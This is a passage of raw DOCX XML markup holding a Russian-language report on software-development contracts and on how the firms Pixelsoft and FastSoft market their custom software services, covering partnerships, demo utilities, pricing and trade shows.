          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Предпочтения заказчика</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Из проведенного анализа очевидно, что существует определенный баланс между рисками заказчика и исполнителя работ, который определяется условиями заключаемого договора и может существенно колебаться как в одну, так и другую сторону. При этом наиболее предпочтительный вариант для заказчика выглядит следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Фиксированное время разработки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Фиксированный бюджет проекта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Жесткое техническое задание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Материальная ответственность исполнителя за убытки, которые может понести заказчик в связи с неисполнением условий договора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обязательства исполнителя по технической поддержке</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Низкая стоимость решения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Предпочтения исполнителя</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Очевидно, что для исполнителя предпочтительно либо не брать на себя существенные риски при разработке продукта, либо закладывать их в стоимость разработки и стараться минимизировать, привлекая более квалифицированных специалистов к проектированию и непосредственно к разработке программного продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практика продвижения услуг по разработке ПО российскими компаниями</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В данном разделе проведем анализ практики продвижения услуг по разработке программного обеспечения на российском рынке на основе нескольких компаний, которые специализируются на оказании таких услуг.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компания Pixelsoft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Компания специализируется на широком спектре задач в области разработки программного обеспечения в различных областях информационных технологий, в том числе: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>базы данных</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>искусственный интеллект и экспертные системы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>машинная графика</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>проектирование операционных систем</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>параллельное программирование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>программирование мультимедиа</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>конструирование компиляторов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>математическое моделирование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>защита информации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сетевые решения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WEB-программирование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>системы управления</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>программирование устройств</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Продвижение услуг</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рассмотрим основные при</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>мы, которые компания Pixelsoft успешно применяет при продвижении своих продуктов и услуг.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Работа с партн</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>рами</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Стратегия продвижения услуг компании заключается в наличие партнерского статуса с известными отраслевыми лидерами, такими как компания Cisco, специализирующаяся на сетевом оборудовании и компания 1C, которая известна своими решениями для обеспечения бухгалтерского, финансового и складского учета, а также средствами анализа данных для предприятий в различных отраслях.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Демонстрационные утилиты – демонстрация качества услуг потенциальным заказчикам</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компания имеет определенный набор утилит собственной разработки, часть из которых бесплатна и доступна для скачивания с официального сайта компании в сети Интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основное назначение представленных утилит – быстрая и удобная синхронизация данных между настольным и карманным компьютером. Эти продукты служат своего рода демонстрацией, на которой потенциальные заказчики могут посмотреть качество программных продуктов, разрабатываемых компанией Pixelsoft.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Скидки постоянным клиентам. Для постоянных клиентов компании действует система скидок, которая прежде всего распространяется на доработку и внесение изменений в решения, ранее разработанные под заказ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сертификация и обучение специалистов компании. Компания Pixelsoft проводит обучение собственных специалистов в сертифицированных Microsoft учебных центрах. Большинство специалистов компании сдали сертификационные экзамены и сертифицированы по программе MicrosoftCertifiedSoftwareDeveloper.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компания FastSoft. Основное направление деятельности компании FastSoft - разработка программного обеспечения на заказ. Компания выполняет полный цикл услуг по разработке программного обеспечения на заказ, включая предпроектный анализ, оценку проекта, проектирование, разработку, тестирование, внедрение и сопровождение программного продукта. Компания ориентируется на потребности в программном обеспечении мелкого и среднего бизнеса. В основном компания решает задачи связанные с:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ведением клиентских баз данных</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Генерацией и учетом документов различной отчетности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Складским учетом</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Планированием и контролем текущих задач клиента</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Продвижение продуктов и услуг</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рассмотрим основные элементы стратегии, которые компания FastSoft использует для продвижения услуг на рынке:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Известные проекты</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Стратегия продвижения услуг компании основана, прежде всего, на известных проектах, в которых компания принимала участие. Среди известных клиентов компании банк </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ИнтерКомерц</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, Транспортно-экспедиционная компания </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Трек-Сервис</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, Торгово-промышленная группа KRAFT и ряд других крупных компаний.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Коробочные</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> продукты</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Компания имеет большое число </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>коробочных</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> продуктов собственной разработки, в числе которых, например программа </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Спортклуб</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> предназначенная для учета, регламентирования, оптимизации тренерской работы в спортивных клубах, а также для организации финансовой деятельности клуба, объединений, федераций. </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Коробочные</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> продукты и известные заказчики используются компанией в качестве демонстрации успешности реализуемых проектов и становятся основой для привлечения новых заказов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Прозрачное ценообразование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компания использует прозрачную формулу ценообразования, зависящую от числа человеко-часов, необходимых для разработки того или иного продукта. При этом после заключения контракта общая сумма является фиксированной, что, безусловно, снижает риски клиентов и является одним из факторов, направленных на долгосрочное сотрудничество.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Специализированные выставки и форумы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компания регулярно принимает участие в специализированных выставках и форумах, представляя там свои продукты и услуги.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
